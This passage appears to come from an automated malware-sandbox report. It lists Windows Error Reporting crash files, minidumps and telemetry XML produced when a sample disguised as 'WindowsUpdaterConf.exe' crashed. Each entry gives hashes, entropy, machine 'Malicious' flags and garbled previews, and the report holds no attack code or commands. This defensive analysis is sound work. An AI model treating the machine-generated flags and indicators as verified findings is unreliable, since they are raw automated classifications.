                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.7.6.4.7.5.1.3.2.7.6.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.7.6.4.8.2.6.3.2.7.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.2.8.d.7.d.b.-.c.a.2.9.-.4.c.7.c.-.b.2.7.a.-.6.3.8.b.6.1.5.6.a.9.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.c.4.d.c.1.3.-.8.9.c.6.-.4.7.2.e.-.8.9.7.a.-.7.b.b.a.f.0.4.0.f.6.6.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.n.d.o.w.s.U.p.d.a.t.e.r.C.o.n.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.s.W.K.M.i.e.8.X.g.h.4.u.o.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.2.8.-.0.0.0.1.-.0.0.1.4.-.e.a.0.e.-.8.c.2.f.4.5.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.f.b.7.7.b.d.0.f.3.7.1.9.4.d.6.d.6.1.a.b.a.1.5.f.f.b.4.8.8.8.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.a.6.6.3.f.3.b.6.4.f.b.9.8.6.3.1.6.4.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.0424401258828546
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:FkXFO20cb+n6a6chhzuiFf9Z24IO8dcr:SXFscSn6apHzuiFFY4IO8d
                                                                                        MD5:280279A758BF7156D0167C0D8463537F
                                                                                        SHA1:03AB2780E76A16DF51836749948510543AC9F32C
                                                                                        SHA-256:09B9F428BC03F2BFDB14158909585AD5CE17B1439EA60C30E7EFF2D82ACFD5DA
                                                                                        SHA-512:508474DB45C474916D4F2A5F3CA1AB42FFC027F345536736B808515D31DDAA2CD02E36BE0BF7C5FEED7268FF4317544BB7B4BE05D845C518A02757C36EAE3A67
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.7.6.5.6.1.4.0.7.3.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.7.6.5.7.7.0.3.2.3.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.6.8.8.d.2.2.-.8.a.4.d.-.4.d.5.4.-.b.1.e.8.-.1.7.5.6.b.2.3.4.d.6.5.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.9.a.0.b.9.f.-.6.b.9.4.-.4.4.e.6.-.a.8.0.6.-.b.c.c.e.6.d.5.c.3.9.2.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.n.d.o.w.s.U.p.d.a.t.e.r.C.o.n.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.s.W.K.M.i.e.8.X.g.h.4.u.o.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.c.8.-.0.0.0.1.-.0.0.1.4.-.c.e.0.2.-.8.f.3.4.4.5.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.f.b.7.7.b.d.0.f.3.7.1.9.4.d.6.d.6.1.a.b.a.1.5.f.f.b.4.8.8.8.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.a.6.6.3.f.3.b.6.4.f.b.9.8.6.3.1.6.4.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.042563090908419
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:SoVGAHbO20cb+n6a6chhzuiFIZ24IO8dc:SwLHbscSn6apHzuiFIY4IO8d
                                                                                        MD5:EC71C659BD6A08B3D1278006E7E3ECDF
                                                                                        SHA1:CCE18A8FDD4942680B435086DB64411A4D53129E
                                                                                        SHA-256:B8202A4F15287698F853358FAC54160D2EEAA2BCF5CFC197CB804D6558F5FAE6
                                                                                        SHA-512:56498CDB9717AB07E448840B7C2B480D2CC7509AD70750A827203FB379DC42F305D1BBF73C30F651AF0847BB24D616542031AD2B82215DC189F5312620FC1C25
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.7.7.2.6.7.7.2.1.8.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.7.7.2.7.3.9.7.1.8.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.5.8.6.2.3.6.-.1.8.1.8.-.4.9.0.4.-.9.b.e.7.-.c.6.4.6.1.2.b.e.e.9.7.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.2.f.2.7.f.3.-.c.1.f.a.-.4.0.4.2.-.9.4.f.0.-.7.1.b.3.5.1.9.2.6.5.a.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.n.d.o.w.s.U.p.d.a.t.e.r.C.o.n.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.s.W.K.M.i.e.8.X.g.h.4.u.o.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.3.8.-.0.0.0.1.-.0.0.1.4.-.4.7.6.7.-.c.5.5.e.4.5.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.f.b.7.7.b.d.0.f.3.7.1.9.4.d.6.d.6.1.a.b.a.1.5.f.f.b.4.8.8.8.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.a.6.6.3.f.3.b.6.4.f.b.9.8.6.3.1.6.4.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.0410223725671461
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:rwgBUHvcxyb20cb+nRqxaGXL5TzuiFf9Z24IO8HzB:HOyycSnKa+JzuiFFY4IO89
                                                                                        MD5:7A0BCE69001069D8BC495EF499CD2404
                                                                                        SHA1:5EB62D41F24A268AE2B4A0CD8D6805EDA4CB7989
                                                                                        SHA-256:D265D64544AF4566D0FFE83DD08F045726FC610C8C5FE0B20BE27E39DAD62B0C
                                                                                        SHA-512:BC93EA59FAB32DF589BE2C4A574E38D845D290DD0686E77243479598321DA46F236E2C9CA955FAD5BA41A9B7FCFA1C9AADEE2694BABB21D0834EF88FBD9E645F
                                                                                        Malicious:true
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.7.6.2.0.5.3.3.1.3.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.7.6.2.1.1.7.3.7.5.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.1.3.1.7.6.5.-.4.8.6.c.-.4.f.4.7.-.8.5.6.d.-.f.b.5.b.7.0.f.a.b.6.2.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.e.1.f.5.c.1.-.2.1.4.e.-.4.f.7.b.-.b.c.f.7.-.c.e.0.6.a.f.8.3.c.4.e.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.s.W.K.M.i.e.8.X.g.h.4.u.o.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.9.4.-.0.0.0.1.-.0.0.1.4.-.f.c.0.6.-.5.b.1.f.4.5.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.3.a.b.5.b.a.8.4.a.9.9.5.1.f.7.e.b.6.5.b.1.5.6.8.2.3.7.4.2.b.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.a.6.6.3.f.3.b.6.4.f.b.9.8.6.3.1.6.4.d.1.0.a.c.6.9.8.b.e.f.0.3.d.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.034391585899798
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:FwiB4zHv5/yb20cb+nRqxaichhzuiFf9Z24IO8HzB:6g4jRycSnKaRHzuiFFY4IO89
                                                                                        MD5:6E26BD48FF82691A9502F188B3736B76
                                                                                        SHA1:5E07AD981063E5D4E60CA3DC7B108EFDD2A407F0
                                                                                        SHA-256:416CB54229EC0537294588CCBD87BE66E99CFE5B066F14A431BD3A10D75C3B86
                                                                                        SHA-512:3ECB434DF5644AC79FFEA05A56149106D48B62E32C04A77A0E7B5B845679A476C67C4F28887419CA0889ECF45A6347E1970FE5CB95483F66080D800092839F0A
                                                                                        Malicious:true
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.7.6.2.8.9.3.1.7.2.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.7.6.2.9.6.9.7.3.5.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.7.7.6.1.b.0.f.-.1.f.4.9.-.4.2.5.c.-.8.1.4.f.-.9.f.e.6.3.e.f.7.c.7.6.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.f.b.9.2.1.2.-.6.9.7.2.-.4.c.7.b.-.8.7.f.0.-.9.5.1.0.5.8.9.2.8.0.8.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.k.s.W.K.M.i.e.8.X.g.h.4.u.o.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.c.c.-.0.0.0.1.-.0.0.1.4.-.6.8.d.3.-.7.3.2.4.4.5.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.3.a.b.5.b.a.8.4.a.9.9.5.1.f.7.e.b.6.5.b.1.5.6.8.2.3.7.4.2.b.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.7.a.6.6.3.f.3.b.6.4.f.b.9.8.6.3.1.6.4.d.1.0.a.c.6.9.8.b.e.f.0.3.d.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 18:40:47 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):220546
                                                                                        Entropy (8bit):3.8709952393219416
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:SHLgDf4uEqyyGOLTgsGqluJotCnw/gf46:Skj4518TgGFc1f
                                                                                        MD5:3B106A1F56680E397F7576EF5E984946
                                                                                        SHA1:B586D1EF6C2971055123E914E6DBF9F5430941D3
                                                                                        SHA-256:3C8D13E6FADB01D0CB8B5202DCE25495941DEFE06A10A66635DC21E967E86B9C
                                                                                        SHA-512:F3A0C1DC8500BFAEC7EEB509DD80363132A58FB36EAAF20A87BF095B74C1031DCEC7C8B5C022235D1A0BA0A5BD8CB8DA7DF6ADE8C5B2721323E88EDB1E8AC198
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .........Qg............................(.......$............%...I..........`.......8...........T............,...0..........@...........,!..............................................................................eJ.......!......GenuineIntel............T.......(.....Qg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8416
                                                                                        Entropy (8bit):3.690385673854538
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJCE6rK6Y9tSU/ZwBCgmfZ//MIrpDQ89bWnksfWaym:R6lXJh6e6Y3SUxkCgmfx/vWnXfJ
                                                                                        MD5:66F3287B03B322C09A3F90F1723B100D
                                                                                        SHA1:58E07AC72CFF04371C59D5E1FB19477745AD1C64
                                                                                        SHA-256:7E58C63D52F20514CFFA767090089BBF2BDCC6BDBE00D7C0D3BB207629D7C71B
                                                                                        SHA-512:6E149B92C9DB8A60EF7E5BC2C888674A7233C68F0CF4867770CAA601DED34382FAD8EBF87F461D5D34787065220DD5DBC8F9CA9AFFDFB84BE589D3BC86C1DFFD
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.8.4.<./.P.i.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4780
                                                                                        Entropy (8bit):4.47606919670625
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZpJg77aI9LAWpW8VYgYm8M4Ju/7PFn+q8vc/7JJuvC/KBJg2kNd:uIjfdI7V57V4J0K0JuvLg2od
                                                                                        MD5:6909905FFC8BFFA352B0CB0787C51FB3
                                                                                        SHA1:A43AE8EE66FE339DDF8C7E79D829BE1F32F87B72
                                                                                        SHA-256:30D0F8C9D43D57551E988977C11566EB649540DA1D1CCE3666E143A69F00CA7B
                                                                                        SHA-512:5EF990589D7090B45E8D84A1B602BB7C12AD3EA1B96FC39B78D580D74F3878E41378F8491D0812D52E42CF644FEE61D2AAEAEB57086FBF7547A2C6588FCBE1F6
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 18:43:07 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):228262
                                                                                        Entropy (8bit):3.9235155941035607
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:Ob7TgioCAQd4uEqomLTg7Vrq1KG86rZy7ef:W7U/J44MTg7Vr48sf
                                                                                        MD5:56FEC9E49984E854A2EC2C5DE20DD0DB
                                                                                        SHA1:CAAA8D171E648A68EEE65EA6ABF83FBD13FA6766
                                                                                        SHA-256:4A149E21542130EE906110982478F50CEBDFF0CAF937A8945F7039D20719F41E
                                                                                        SHA-512:2D299FA3FDD636843D1FDFC6F09DD6269A8DBB8C70CEC631F08460D2774556711FDFAD24D38143216C81C9B64928A23EFDA85185644F97DDE6B6C76C9BCED5DE
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .......;.Qg............................(.......<............*...I..........`.......8...........T...........p,..6O..........X...........D!..............................................................................eJ.......!......GenuineIntel............T...........4.Qg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8398
                                                                                        Entropy (8bit):3.685388185272187
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJRP6vqAe6YEfCSUUcgmfZ//MIrpDT89blbysf8fjm:R6lXJ56U6YEKSUXgmfx/GlbxfM6
                                                                                        MD5:8E1D659138AF66EB91E0E70B973EB001
                                                                                        SHA1:54BA1EC9B292C9AEDAB8DB3278EB662D4208CF20
                                                                                        SHA-256:60098FBC099B5DECC502230E3FD0670364FFFA1D5D0A39CCACB325E7D29D17EF
                                                                                        SHA-512:284536534F236DB2903578F26743333F87950BD87F28844B04EE3C31BDC4D0E1F2674D172DDD7A6509480E5623DF3326F85F81E1ED63A4C27A0C80C3A67A5FE5
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.2.4.<./.P.i.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 18:40:56 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):224160
                                                                                        Entropy (8bit):3.976298803735886
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:QJ0EBiDsQ4oI4uEqGLTgVo3OqNYxJjlno2:QJhsJI43Tg47C
                                                                                        MD5:D8C7FDF9A910BC3BB0739F2EB460B3CE
                                                                                        SHA1:A9AE49CECA66DC2622F19192A93A1CCDE9273272
                                                                                        SHA-256:71FF409DAF432B461DB366570066F68B1D91F7E7FF96C185B40B24CD53D52BD6
                                                                                        SHA-512:DDBD0EF3F4FB6530FD95BD9C5ED6D495769C4136EC1EA17992A6A20F966B5718D2FFA5CA8F5C10606DBCBEE3F78DB459C5E4C66CEF3FBF6601D4864AB505942F
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .........Qg............................(.......$...........t*...I..........`.......8...........T............,...?..........@...........,!..............................................................................eJ.......!......GenuineIntel............T.............Qg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4780
                                                                                        Entropy (8bit):4.477070785906129
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZDJg77aI9LAWpW8VYlYm8M4Ju/7PFHw+q8vc/7QhGuvC/KBJg2zNd:uIjf7I7V57V5J3KmuvLg2xd
                                                                                        MD5:8085A79DFD6D192F4E3849F9DE7533DE
                                                                                        SHA1:6A4155B51A90289A4F066B9CA8A5CA84076CF1CC
                                                                                        SHA-256:CAF2AA185391CAF9D8F2D6AB4C90A6B99E421F46F40660F6610D0561EC641705
                                                                                        SHA-512:059F8D6254ABB4745FBA2F89831FF55F9E501BAD0051E95EE61A4BB87104C287A0C41A0D1859C1CC85ED312FA6BFE9E276FBA99B9AE8ECA60B2704AE17B99F80
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618345" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8416
                                                                                        Entropy (8bit):3.688024465446068
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJxz6eB66Y9KSUhZUJ6gmfZ//MIrpDt89buQsfQ6m:R6lXJF6N6YgSUfw6gmfx/IujfM
                                                                                        MD5:D9183DD5C79609A5A00ED66323B25906
                                                                                        SHA1:0E7883498A430DA732F0B9939C77064FD9ACFB9D
                                                                                        SHA-256:E03C620F5701A6575757F541E6368EF252F86FBCEBD1A5720EEBD823F9784D8C
                                                                                        SHA-512:FFA42770FDB8FD5135AA941702F3740BC48EE5F6FA4FA65D101249481570EBC11ADE7DC8B61FBA259101DE607A53CBD34FB8BDF138506EDD9B34CD0F27E48B8B
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?><WERReportMetadata><OSVersionInformation><WindowsNTVersion>10.0</WindowsNTVersion><Build>19045</Build><Product>(0x30): Windows 10 Pro</Product><Edition>Professional</Edition><BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString><Revision>2006</Revision><Flavor>Multiprocessor Free</Flavor><Architecture>X64</Architecture><LCID>2057</LCID></OSVersionInformation><ProcessInformation><Pid>4040</Pi
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4780
                                                                                        Entropy (8bit):4.475982404524727
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZpJg77aI9LAWpW8VY8Ym8M4Ju/7PFvv7BI+q8vc/7MuvC/KBJg27Nd:uIjfdI7V57VMJ6VIKjuvLg2Jd
                                                                                        MD5:5FB94BC07538E8B7C49AC498067CC099
                                                                                        SHA1:AF6E00EE615A00E2E6C017D7B8CDB15242436620
                                                                                        SHA-256:8F2F7E5B1EAEE8F991FE03F726CD813E16C7351AA3A82CF85D05F9463E83CD17
                                                                                        SHA-512:D71408B716E33D38A684FC729D6797B8BA6FCBF90C1D9B73F77DB61FCE49AFF079D0539061713A31587397EF9207013AE68C826041FD1F1B81CE27342495B3D9
                                                                                        Malicious:false
